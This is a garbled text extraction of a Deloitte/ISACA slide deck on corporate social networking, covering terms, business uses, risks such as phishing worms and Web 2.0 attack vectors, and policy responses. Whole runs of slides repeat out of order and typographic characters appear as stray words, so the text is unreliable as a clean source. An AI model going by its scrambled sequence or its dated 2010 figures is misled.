bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg7
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Mapping and measuring of relationships and flows among people groups organizations computers or other information knowledge processing entities
bull The nodes in the network are the people and groups while the links show relationships or flows between the nodes
bull Provides both a visual and a mathematical analysis of human relationships
Social network analysis
wwwisacaorg8
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Web sites where entries are made (such as in a journal or diary) displayed in a reverse chronological order often provide commentary or news on a particular subject
bull Some function as personal online diaries or logbooksbull Combine text images and links to other blogs and Web
sitesbull Typically provide archives in calendar form local search
syndication feeds reader comment posting trackback links from other blogs blogroll links to other recommended blogs and categories of entries tagged for retrieval by topic
Blogs
wwwisacaorg9
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Short frequent posts with questions information or current status
bull Twitter (public) and Yammer (private) are two examplesbull Social software (including Facebook LinkedIn and
MySpace) now prompts for ldquowhatrsquos on your mindrdquo or similar status or mood lines
Microblogging
wwwisacaorg10
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Web sites which allow users to easily add remove edit and change most available content
bull Effective for collaborative writing and self-service Web site creation and maintenance
Wikis
wwwisacaorg11
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Wikipedia ndash perhaps the best known Wikindash Launched on 15 January 2000ndash First edit on 16 January followed by 1000 articles in the first
month ndash Now has 17 million articles in 270 languages all written by
volunteers ndash Billionth edit took place on 16 April 2010 ndash Used by 400 million people every month ndash Claims to have 80000 editors although reports suggest that it
has recently lost thousands something Wikipedia disputes ndash Aims to grow to one billion users by 2015 with a focus on
women and people in the developing world ndash Critics maintain that many entries are untrustworthyndash But a disputed study has shown that for subjects such as
science it comes as close as traditional encyclopedias
Statistics taken from httpwwwbbccouknewstechnology-12171977
Wikis (cont)
wwwisacaorg12
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull A range of tools which facilitate social networkingbull Personal Web pages including bios photos interests
audio and video links to friends messages from friends and personal networks
Social networking software
wwwisacaorg13
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Facebook ndash the biggest of them allndash Over 500 million registered users ndash 50 of our active users log on to Facebook in any given day ndash About 70 of Facebook users are outside the US ndash More than 30 billion pieces of content (web links news
stories blog posts notes photo albums etc) shared each month
ndash People spend over 700 billion minutes per month on Facebook
Statistics taken from httpwwwfacebookcompressinfophpstatistics (Sept 2010)
bull As of March 13 2010 Facebook was Americarsquos most popular site according to Experian Hitwise with 71 of traffic compared to Googlersquos 70
Social networking software (cont)
wwwisacaorg14
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Sites which allow users to share links to sites with othersbull Tags are metadata which classify content into categoriesbull Can be used to aid searches create tag clouds and link
disparate sources
Social bookmarking and tagging
wwwisacaorg15
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Using feeds available from a Web site to provide an updated list of its content in the form of a subscription an embedded portion of a Web site or a collection of disparate content on a particular topic
bull RSS (Really Simple Syndication) or Atom syndication and rss xml or rdf files used for the feeds
bull Mashups combine data and feeds from multiple sources to provide a single integrated set of information ldquoeg data plotted on a maprdquo
Syndication and mashups
wwwisacaorg16
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Online collections of videos and photos from usersbull Users can upload tag and rate contentVideos and
photos
wwwisacaorg17
Social Networking CompaniesSocial Networking Companies
Social Media Popular Examples
Wikis Wikitravel Wikipedia wikiHow WikiBooks the TV IV
Blogs livejournal WordPress Blogger Technorati xanga
Social Networking myspacecom LinkedIn facebook friendster plaxo
RSS(Really Simple Syndication)
newsgator Bloglines iGoogle FeedBurner
Presence and Microblogging
twitter Pownce jaiku Hictu tumblr
Social Bookmarkingand Tagging
delicious digg reddit newsvine StumbleUpon
Online Photo andVideo Sharing
YouTube flickr shutterfly last-fm slideshare
wwwisacaorg18
Why and how companies are Why and how companies are using social networkingusing social networking
wwwisacaorg19
Statistics on companies using Social Statistics on companies using Social NetworkingNetworking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg20
Statistics on companies using Social Statistics on companies using Social Networking (cont)Networking (cont)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg21
Companies typically adopt Social Media for Companies typically adopt Social Media for three major benefitsthree major benefits
Increase employee productivityand operational efficiencies
Foster creativity innovationand collaboration
Enhance customer andpartner relationships
1
2
3
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg8
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Web sites where entries are made (such as in a journal or diary) displayed in a reverse chronological order often provide commentary or news on a particular subject
bull Some function as personal online diaries or logbooksbull Combine text images and links to other blogs and Web
sitesbull Typically provide archives in calendar form local search
syndication feeds reader comment posting trackback links from other blogs blogroll links to other recommended blogs and categories of entries tagged for retrieval by topic
Blogs
wwwisacaorg9
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Short frequent posts with questions information or current status
bull Twitter (public) and Yammer (private) are two examplesbull Social software (including Facebook LinkedIn and
MySpace) now prompts for ldquowhatrsquos on your mindrdquo or similar status or mood lines
Microblogging
wwwisacaorg10
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Web sites which allow users to easily add remove edit and change most available content
bull Effective for collaborative writing and self-service Web site creation and maintenance
Wikis
wwwisacaorg11
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Wikipedia ndash perhaps the best known Wikindash Launched on 15 January 2000ndash First edit on 16 January followed by 1000 articles in the first
month ndash Now has 17 million articles in 270 languages all written by
volunteers ndash Billionth edit took place on 16 April 2010 ndash Used by 400 million people every month ndash Claims to have 80000 editors although reports suggest that it
has recently lost thousands something Wikipedia disputes ndash Aims to grow to one billion users by 2015 with a focus on
women and people in the developing world ndash Critics maintain that many entries are untrustworthyndash But a disputed study has shown that for subjects such as
science it comes as close as traditional encyclopedias
Statistics taken from httpwwwbbccouknewstechnology-12171977
Wikis (cont)
wwwisacaorg12
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull A range of tools which facilitate social networkingbull Personal Web pages including bios photos interests
audio and video links to friends messages from friends and personal networks
Social networking software
wwwisacaorg13
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Facebook ndash the biggest of them allndash Over 500 million registered users ndash 50 of our active users log on to Facebook in any given day ndash About 70 of Facebook users are outside the US ndash More than 30 billion pieces of content (web links news
stories blog posts notes photo albums etc) shared each month
ndash People spend over 700 billion minutes per month on Facebook
Statistics taken from httpwwwfacebookcompressinfophpstatistics (Sept 2010)
bull As of March 13 2010 Facebook was Americarsquos most popular site according to Experian Hitwise with 71 of traffic compared to Googlersquos 70
Social networking software (cont)
wwwisacaorg14
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Sites which allow users to share links to sites with othersbull Tags are metadata which classify content into categoriesbull Can be used to aid searches create tag clouds and link
disparate sources
Social bookmarking and tagging
wwwisacaorg15
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Using feeds available from a Web site to provide an updated list of its content in the form of a subscription an embedded portion of a Web site or a collection of disparate content on a particular topic
bull RSS (Really Simple Syndication) or Atom syndication and rss xml or rdf files used for the feeds
bull Mashups combine data and feeds from multiple sources to provide a single integrated set of information ldquoeg data plotted on a maprdquo
Syndication and mashups
wwwisacaorg16
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Online collections of videos and photos from usersbull Users can upload tag and rate contentVideos and
photos
wwwisacaorg17
Social Networking CompaniesSocial Networking Companies
Social Media Popular Examples
Wikis Wikitravel Wikipedia wikiHow WikiBooks the TV IV
Blogs livejournal WordPress Blogger Technorati xanga
Social Networking myspacecom LinkedIn facebook friendster plaxo
RSS(Really Simple Syndication)
newsgator Bloglines iGoogle FeedBurner
Presence and Microblogging
twitter Pownce jaiku Hictu tumblr
Social Bookmarkingand Tagging
delicious digg reddit newsvine StumbleUpon
Online Photo andVideo Sharing
YouTube flickr shutterfly last-fm slideshare
wwwisacaorg18
Why and how companies are Why and how companies are using social networkingusing social networking
wwwisacaorg19
Statistics on companies using Social Statistics on companies using Social NetworkingNetworking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg20
Statistics on companies using Social Statistics on companies using Social Networking (cont)Networking (cont)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg21
Companies typically adopt Social Media for Companies typically adopt Social Media for three major benefitsthree major benefits
Increase employee productivityand operational efficiencies
Foster creativity innovationand collaboration
Enhance customer andpartner relationships
1
2
3
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
